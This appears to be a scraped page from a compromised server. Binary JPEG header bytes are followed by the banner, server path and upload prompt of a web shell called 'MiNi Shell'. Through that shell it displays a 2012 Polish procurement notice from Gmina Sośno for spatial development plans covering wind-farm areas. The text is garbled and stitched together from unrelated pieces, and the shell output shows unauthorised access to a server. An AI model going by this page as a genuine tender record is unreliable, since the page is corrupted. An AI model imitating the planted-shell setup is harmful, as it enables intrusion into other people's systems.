JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/186392-N-2012.html

<p class="kh_header"><b>Sośno: Opracowanie projektów miejscowych planów zagospodarowania przestrzennego obejmujących obszary położone w gminie Sośno w zakresie określonym uchwałami Rady Gminy Sośno:
 nr XLII/229/10, nr IV/21/11, nr XLII/230/10, nr XLII/231/10, nr XLII/232/10, 
nr XLII/233/10, nr XLII/234/10, nr XLII/235/10, nr XLII/236/10, nr XLII/237/10</b><br>
<b>Numer ogłoszenia: 186392 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sośno , ul. Nowa 1, 89-412 Sośno, woj. kujawsko-pomorskie, tel. 0-52 3891213, 3890112, faks 0-52 3891279.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.sosno.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektów miejscowych planów zagospodarowania przestrzennego obejmujących obszary położone w gminie Sośno w zakresie określonym uchwałami Rady Gminy Sośno:
 nr XLII/229/10, nr IV/21/11, nr XLII/230/10, nr XLII/231/10, nr XLII/232/10, 
nr XLII/233/10, nr XLII/234/10, nr XLII/235/10, nr XLII/236/10, nr XLII/237/10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie projektów miejscowych planów zagospodarowania przestrzennego obejmujących obszary położone w gminie Sośno w zakresie określonym uchwałami Rady Gminy Sośno:
 nr XLII/229/10, nr IV/21/11, nr XLII/230/10, nr XLII/231/10, nr XLII/232/10, nr XLII/233/10, nr XLII/234/10, nr XLII/235/10, nr XLII/236/10, nr XLII/237/10 
1. Opis przedmiotu zamówienia : 
1.1 Przedmiotem zamówienia jest wykonanie usługi polegającej na opracowaniu projektów miejscowych planów zagospodarowania przestrzennego (9 planów) obejmujących obszary położone w Gminie Sośno, przeznaczonych między innymi pod farmy wiatrowe (o łącznej pow. ok. 5990 ha) wraz z opracowaniem ekofizjograficznym podstawowym oraz prognozą oddziaływania na środowisko projektów miejscowych planów zagospodarowania przestrzennego oraz udziałem w czynnościach wynikających z procedury ich sporządzania 

1.2.Przedmiot zamówienia należy wykonać w szczególności z uwzględnieniem: obiektów, zespołów i obszarów objętych ochroną prawną na podstawie przepisów odrębnych,   aktualnego studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Sośno (Uchwała Nr XXV/149/08 Rady Gminy Sośno z dnia 4 grudnia 2008 r.), decyzji o warunkach zabudowy, decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz decyzji o pozwoleniu na budowę. 

1.3 Projekty miejscowych planów zagospodarowania przestrzennego objęte przedmiotem niniejszego zamówienia powinny być sporządzone w szczególności zgodnie z Ustawą z dnia 
27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz. 717 z późn. zm.) oraz aktami wykonawczymi do w/w Ustawy, zwłaszcza Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164, poz. 1587). Prognozy oddziaływania na środowisko projektów miejscowych planów zagospodarowania przestrzennego objęte przedmiotem niniejszego zamówienia powinny być sporządzone w szczególności zgodnie z Ustawą z dnia 
3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.) oraz zakresem uzgodnionym przez właściwe organy, zgodnie z przepisami odrębnymi.
W przypadku zmiany przepisów mających wpływ na procedowane projekty miejscowych planów zagospodarowania przestrzennego, Wykonawca jest zobowiązany dostosować przedmiot, zakres  i projektowane ustalenia projektów miejscowych planów zagospodarowania przestrzennego do obowiązującego stanu prawnego oraz w razie potrzeby ponowić lub uzupełnić procedurę ich sporządzania celem zapewnienia zgodności z obowiązującymi przepisami. Analogiczne warunki dotyczą prognozy oddziaływania na środowisko projektów miejscowych planów zagospodarowania przestrzennego objętych przedmiotem zamówienia.

1.4 W ramach wykonania przedmiotu zamówienia Wykonawca wykona wszelkie opracowania i podejmie wszelkie czynności niezbędne do uchwalenia planów zagospodarowania przestrzennego objętych przedmiotem niniejszego zamówienia, w tym w szczególności:
1) opracuje inwentaryzację urbanistyczną oraz wymagane opracowania ekofizjograficzne, zgodnie z wymogami  określonymi w Rozporządzeniu Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz. U. Nr 155, poz. 1298), z uwzględnieniem wniosków i materiałów branżowych dostępnych u Regionalnego Dyrektora Ochrony Środowiska oraz materiałów przekazanych przez Urząd Gminy w Sośnie ( tj. rocznego monitoringu chiropterologicznego oraz rocznego monitoringu ornitologicznego terenu planowanej farmy elektrowni wiatrowych Sośno).
2) opracuje projekty planów objętych przedmiotem niniejszego zamówienia - projekty uchwał zawierających część tekstową tj.: ustalenia planu, oraz część graficzną tj.: rysunek planu sporządzony kopii map i w skali zgodnej z wymaganiami art. 16 Ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz. 717 z późn. zm.); Zamawiający preferuje skalę 1:2000 oraz dopuszcza zastosowanie dla terenów z zakazem zabudowy skali 1: 5000 (w przypadku zakupu takich map w państwowym zasobie geodezyjnym i kartograficznym) - zgodnie z przepisami ustawy o planowaniu i zagospodarowaniu przestrzennym;
3) pozyska wypisy z niezbędnych ewidencji ,
4) wykona koncepcje rozwoju infrastruktury technicznej, ze szczególnym uwzględnieniem elektroenergetyki,
5)opracuje prognozy oddziaływania na środowisko projektów miejscowych planów zagospodarowania przestrzennego, wykonane w ramach strategicznej oceny oddziaływania na środowisko, zgodnie z ustawą z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r., Nr 199, poz. 1227 z późn. zm.); 
6) sporządzi prognozy skutków finansowych uchwalenia miejscowych planów zagospodarowania objętych przedmiotem niniejszego zamówienia, uwzględniające wymagania określone w przepisach prawa, zwłaszcza w rozporządzeniu Ministra Infrastruktury z dnia 
26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587); 
7) uzyska wszelkie niezbędne opinie oraz uzgodnienia projektów planów objętych przedmiotem niniejszego zamówienia z właściwymi organami oraz ich prognoz oddziaływania na środowisko, zgodnie z właściwymi przepisami prawa, a także, w miarę potrzeby, zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne w trybie przepisów ustawy dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych( Dz.U. z 2004 r. Nr 121, poz.1266 z późn.zm).; w przypadku konieczności uzyskania zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne w trybie przepisów ustawy dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych( Dz.U. z 2004 r. Nr 121, poz.1266 z późn.zm) Wykonawca jest zobowiązany opracować stosowny/ne wniosek/i wraz ze wszystkimi załącznikami i pismami przewodnimi w ilości niezbędnej do przeprowadzenia tej procedury; 
8) dokona stosownych modyfikacji projektów planów objętych przedmiotem niniejszego zamówienia oraz ich prognoz oddziaływania na środowisko, wynikających z uzyskanych opinii, uzgodnień, uwag wniesionych przez osoby fizyczne i prawne oraz jednostki organizacyjne nieposiadające osobowości prawnej oraz w razie konieczności ponowi ich procedurę w niezbędnym zakresie; 
9) opracuje projekty uchwał i prognoz oddziaływania na środowisko dotyczących wszystkich planów objętych przedmiotem niniejszego zamówienia w skali zgodnej z wymaganiami art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz. 717 z późn. zm.) w  egzemplarzach w formie określonej w pkt. 3.6 oraz 3.7; 
10) weźmie udział w spotkaniach z mieszkańcami, posiedzeniach Komisji Rady Gminy Sośno oraz sesjach Rady Gminy Sośno dotyczących realizacji niniejszego zamówienia, na żądanie Zamawiającego;
11) sporządzi projekty wszelkich pism wynikających z procedury sporządzania projektów miejscowych planów zagospodarowania przestrzennego oraz ich prognozy oddziaływania na środowisko, zgodnie z wymogami ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym , Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego oraz ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko; 
12) sporządzi oraz skompletuje dokumentację prac planistycznych wynikającą z procedury sporządzania projektów miejscowych planów zagospodarowania przestrzennego oraz ich prognozy oddziaływania na środowisko, zgodnie z wymogami ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym , Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego oraz ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko; 
13) sporządzi opinie urbanistyczne (podpisane przez uprawnionego urbanistę) do: wniesionych wniosków osób fizycznych i prawnych wniesionych do sporządzanych planów miejscowych, uzyskanych uzgodnień i opinii oraz uwag złożonych do wyłożonych projektów mpzp wraz z prognoza oddziaływania na środowisko z określeniem części uwzględnionej i odrzuconej do wprowadzenia w stosownych projektach (mpzp i prognozy oddziaływania na środowisko) oraz uzasadnieniem faktycznym i prawnym swojej opinii;
14) przygotuje korespondencję (pisma, załączniki do pism, wypełniona zwrotka, zaadresowana koperta) wynikającą z procedury sporządzania projektów miejscowych planów zagospodarowania przestrzennego oraz ich prognozy oddziaływania na środowisko;
15) przygotuje chronologicznie ułożoną i trwale złączoną dokumentację prac planistycznych i procedury strategicznej oceny oddziaływania na środowisko oraz oświadczy o ich kompletności i poprawności pod względem prawnym, ze względu na cel któremu mają służyć;
16) udzieli Zamawiającemu comiesięcznej pisemnej informacji dotyczącej postępów w realizacji niniejszego zamówienia oraz ewentualnych problemów i propozycji ich rozwiązania - informacja ma być aktualna na każdy ostatni dzień miesiąca.    

1.5 W wykonaniu niniejszego zamówienia Wykonawca dostarczy w szczególności: 
1) opracowanie ekofizjograficzne podstawowe - 3 egz. w kolorze, w wersji papierowej i  na nośniku CD/DVD;
2) projekt każdego z planów objętych przedmiotem niniejszego zamówienia wraz z prognozą oddziaływania na środowisko do wewnętrznego opiniowania - 5 egz., w wersji elektronicznej (na nośniku CD/DVD) oraz 2 egz. w wersji papierowej;
3) projekt każdego z planów objętych przedmiotem niniejszego zamówienia wraz z prognozą oddziaływania na środowisko do uzgodnienia - w ilości odpowiadającej wymogom ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz. 717 z późn. zm.) w wersji uzgodnionej z organem właściwym do opiniowania i/lub uzgadniania, w tym uzyskania zgody na zmianę przeznaczenia gruntów rolnych i leśnych na inne cele - oraz dodatkowo 2 egz., w wersji papierowej i  na nośniku CD/DVD do pozostawienia w aktach w Urzędzie Gminy;
4) projekt każdego z planów objętych przedmiotem niniejszego zamówienia wraz z prognozą oddziaływania na środowisko do wyłożenia do publicznego wglądu - 2 egz., w wersji  papierowej i na nośniku CD/DVD;
5) projekt każdego z planów objętych przedmiotem niniejszego zamówienia wraz z prognozą oddziaływania na środowisko do przekazania radnym przed uchwaleniem - 17 egz., w wersji elektronicznej (na nośniku CD/DVD w formacie PDF i jpg oraz 2 egz. w wersji papierowej;
6) projekt każdego z planów objętych przedmiotem niniejszego zamówienia wraz z prognozą oddziaływania na środowisko do uchwalenia - 1 egz., w wersji papierowej oraz na nośniku CD/DVD;
7) projekt każdego z planów objętych przedmiotem niniejszego zamówienia wraz z prognozą oddziaływania na środowisko po uchwaleniu (z wpisanymi numerami uchwał) do podpisania przez Przewodniczącego Rady Gminy Sośno - po 4 egz. w kolorze i czarno-białe, w wersji papierowej i  na nośniku CD/DVD (obowiązuje także przekazanie wersji wektorowych w formacie .dxf, dwg. lub shp. wraz z projektem mxd.);
8) prognoza skutków finansowych uchwalenia każdego z planów objętych przedmiotem niniejszego zamówienia - 3 egz., w wersji papierowej i  na nośniku CD/DVD
9) projekt każdego z planów objętych przedmiotem niniejszego zamówienia do publikacji -1 egz. w wersji elektronicznej w form. XML. oraz załącznik graficzny przygotowany do publikacji (formatki A4 lub pomniejszenie - zgodnie z aktualnymi wymogami Urzędu Wojewódzkiego) oraz wersja do publikacji na stronie Internetowej w formacie PDF;
10) opinie urbanistyczne, w szczególności do: złożonych wniosków osób fizycznych i prawnych wniesionych do sporządzanych planów miejscowych, uzyskanych uzgodnień i opinii oraz uwag złożonych do wyłożonych projektów mpzp wraz z prognoza oddziaływania na środowisko, innych stanowisk organów i jednostek związanych z procedurą sporządzania mpzp i ich prognoz, wyjaśnienia itp. - 2 egz., w wersji papierowej i  na nośniku CD/DVD;
11) dokumentację formalno-prawną prac planistycznych o której mowa w rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587) - (uporządkowanie oryginałów oraz wykonanie ich 2 kopi); dokumentacja winna być trwale zszyta w sposób uniemożliwiający jej rozkompletowanie ;
12) dokumentację formalno-prawną procedury strategicznej oceny oddziaływania na środowisko, zgodnie z ustawą z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r., Nr 199, poz. 1227 z późn. zm.), w tym opracuje stosowne uzasadnienie i podsumowanie - (uporządkowanie oryginałów oraz wykonanie ich 2 kopi); dokumentacja winna być trwale zszyta w sposób uniemożliwiający jej rozkompletowanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Opracowanie projektów miejscowych planów zagospodarowania przestrzennego obejmujących obszary położone w gminie Sośno w zakresie określonym uchwałami Rady Gminy Sośno:
 nr XLII/229/10, nr IV/21/11, nr XLII/230/10, nr XLII/231/10, nr XLII/232/10, nr XLII/233/10, nr XLII/234/10, nr XLII/235/10, nr XLII/236/10, nr XLII/237/10 
- Zamawiajacy przewiduje możliwość udzielania zamówień uzupełniających w wysokości nie wyższej niż 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokosci 3 000,00 zł.
słownie: trzytysiącezłotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja złożonej dokumentacji
spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja złożonej dokumentacji
spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja złożonej dokumentacji
spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja złożonej dokumentacji
spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja złożonej dokumentacji
spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sosno.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sośno
ul. Nowa 1
89-412 Sośno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 10:00, miejsce: Sekretariat Urzędu Gminy Sośno
ul. Nowa 1
89-412 Sośno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





